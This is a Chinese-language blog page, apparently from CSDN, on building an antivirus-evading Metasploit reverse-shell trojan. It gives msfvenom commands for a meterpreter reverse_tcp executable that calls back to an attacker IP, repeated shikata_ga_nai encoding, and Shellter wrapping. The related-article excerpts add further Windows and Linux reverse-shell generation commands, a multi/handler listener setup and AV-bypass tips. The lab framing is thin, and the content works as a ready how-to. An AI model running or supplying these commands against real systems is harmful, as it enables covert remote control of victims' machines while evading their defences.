msf反弹木马之免杀

最新推荐文章于 2025-10-04 11:52:37 发布
原创 最新推荐文章于 2025-10-04 11:52:37 发布 · 2.4k 阅读 · 36 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

原理

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备

win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135

##实战开始
1.打开kali机,在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe

LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
-i 5为使用刚才设定的编码方式对目标进行5次编码

2.命令行输入

shellter

第一个选项选择Aimage.png

3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。
然后等待一段时间······

最低0.47元/天 解锁文章
利用msfvenom制作windows木马
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
反弹木马工具
07-31
反弹木马,渗透神器,用作网络攻防练习使用,建议放入虚拟机安装
MSF制作恶意文件 基础
最新发布
weixin_74737710的博客
10-04 1018
shellcode特征过滤将代码转换为的1.jpg加载 放进buf 再将数据流转换为bytearry 在最后在打包成exe文件 就实现 (exe文件和1.jpg要放在同一目录下)​ QQ => 安全应用 => 某个dll是能被解析并且提取的 => 将这个安全的呢dll替换成被改造过后的dll文件(shellcode)壳不安全,可能被脱壳 => 1. 自研一套壳(使用冷门的加壳手法) 2.软件开发中常用的壳. 遇到了未知加壳手法。有针对性的进行
简单的Msf木马
weixin_47948655的博客
08-12 1659
简单加密shellcode与加载器实现msf木马
Metasploit(msf)系列-木马
chaojixiaojingang
10-10 9555
    木马文件风险高,想要需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成的木马文件与shellter工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
马学习(MSF Evasion)
红队是青春
02-05 607
马学习,MSF Evasion模块
马学习(MSF Shellter)
红队是青春
02-05 421
马学习 MSF Shellter
msf制作木马反弹shell提权
Shinyhuang_的博客
11-03 2409
记录一下目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。方便以后查看 启动kali中的msf ┌──(root????SC)-[~] └─# msfconsole 生成exe类型反弹木马,LHOST=kali的ip msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe [*] exec: msfvenom -
MSF回弹木马ubuntu测试
Thewei666的博客
08-02 768
网站地址为192.168.104.128linux版本信息:20.04.1-Ubuntunginx信息:nginx-1.21.6php信息:PHP 7.3.33-19php-fpm信息:/etc/php/7.3/fpm/php-fpm.conf。
msf生成win版木马
weixin_40709439的博客
01-24 7376
参考一大佬的 在linux下生成一个反弹msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /mo.py 查看下py的内容 将buf值全部替换成mo.py的,其他不用修改 from c...
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1924
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
反弹木马(改进版,含全部代码)
02-23
反弹木马的改进版,功能进一步加强!!!
木马MSFVenom制作木马
没有网络安全就没有国家安全
03-09 3140
木马MSFVenom制作木马
马学习(MSF二进制混淆加密)
红队是青春
02-01 696
2022年笔记,刚入行前马的学习
MSF(2)——各种木马的生成及简单的
realmels的博客
06-11 5175
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的和Python的,原理都是自定义加密及解密可参考前文 https://blog.youkuaiyun.com/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的比较复杂(主要我不会),所以在这里介绍一种简单的方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行,最后将该木马打包成可
木马(1), msfvenom 工具, 木马生成, 编码, 在线木马检测
探测???
12-06 1399
Msfvenom是Metasploit框架中的一个强大工具,用于生成定制的恶意软件载荷,包括反向Shell、Meterpreter Shell、编码的Payload等[3]。它主要用来生成带后门的软件,是Msfpayload和Msfencode的组合,用于生成木马和软件捆绑后门[1][2][4]。在Kali Linux中有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其效果还算不错[5]。
木马处理
weixin_58666006的博客
09-02 2292
木马,脚本型木马和二进制型木马
MSFconsole进阶】evasion(模块):模块使用方法,相关设置
05-24 1994
【渗透工具】MSFconsole进阶:evasion(模块)
初学MSF之渗透、提权、(上)
qq_53058639的博客
08-01 2509
Metasploit是一个费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
msf制作木马
06-06
### 使用 Metasploit Framework 创建木马的技术信息 Metasploit Framework (MSF) 是一款强大的开源渗透测试工具,能够用于创建木马并进行处理。以下是关于如何使用 MSF 创建木马的详细技术信息: #### 1. **生成木马的基本命令** `msfvenom` 是 Metasploit 中专门用于生成木马的工具。它可以通过指定目标平台、有效载荷(payload)、编码器等参数来生成适合不同场景的木马文件。 基本命令格式如下: ```bash msfvenom -p <payload> LHOST=<本地IP> LPORT=<本地端口> -f <输出格式> -o <输出文件> ``` - `-p`:指定要使用的 payload。 - `LHOST`:设置监听的本地 IP 地址。 - `LPORT`:设置监听的本地端口号。 - `-f`:指定输出文件的格式(如 exe、dll、raw 等)。 - `-o`:指定生成木马文件的保存路径和名称[^3]。 #### 2. **常用 Payload 示例** 以下是一些常见的 payload 和其适用场景: - **Windows 反弹 Shell**: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe ``` 此命令生成一个适用于 Windows 系统的 Meterpreter 反弹 Shell,目标主机运行后会连接到攻击者的 IP 地址和端口[^3]。 - **Linux 反弹 Shell**: ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell.elf ``` 此命令生成一个适用于 Linux 系统的反弹 Shell 文件。 #### 3. **对木马进行编码以实现** 为了绕过目标系统的毒软件检测,可以使用编码器对生成的木马进行处理。例如: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe ``` - `-e`:指定编码器,`x86/shikata_ga_nai` 是一种常用的编码器。 - `-i`:指定编码迭代次数,增加复杂度以提高效果[^1]。 #### 4. **启动监听服务** 生成木马后,需要在攻击机上启动监听服务以接收目标主机的连接。可以使用 `msfconsole` 完成此操作: ```bash use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit ``` 以上命令将配置一个 handler 模块,等待目标主机运行木马后建立连接[^3]。 #### 5. **注意事项** - 确保攻击机和目标机之间的网络连通性。 - 使用合法授权进行渗透测试,避非法行为。 - 根据目标环境选择合适的 payload 和编码器[^5]。 --- ### 示例代码 以下是一个完整的示例,展示如何生成一个简单的 Windows 反弹 Shell 并启动监听: ```bash # 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o shell.exe # 启动监听 msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit ``` ---
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值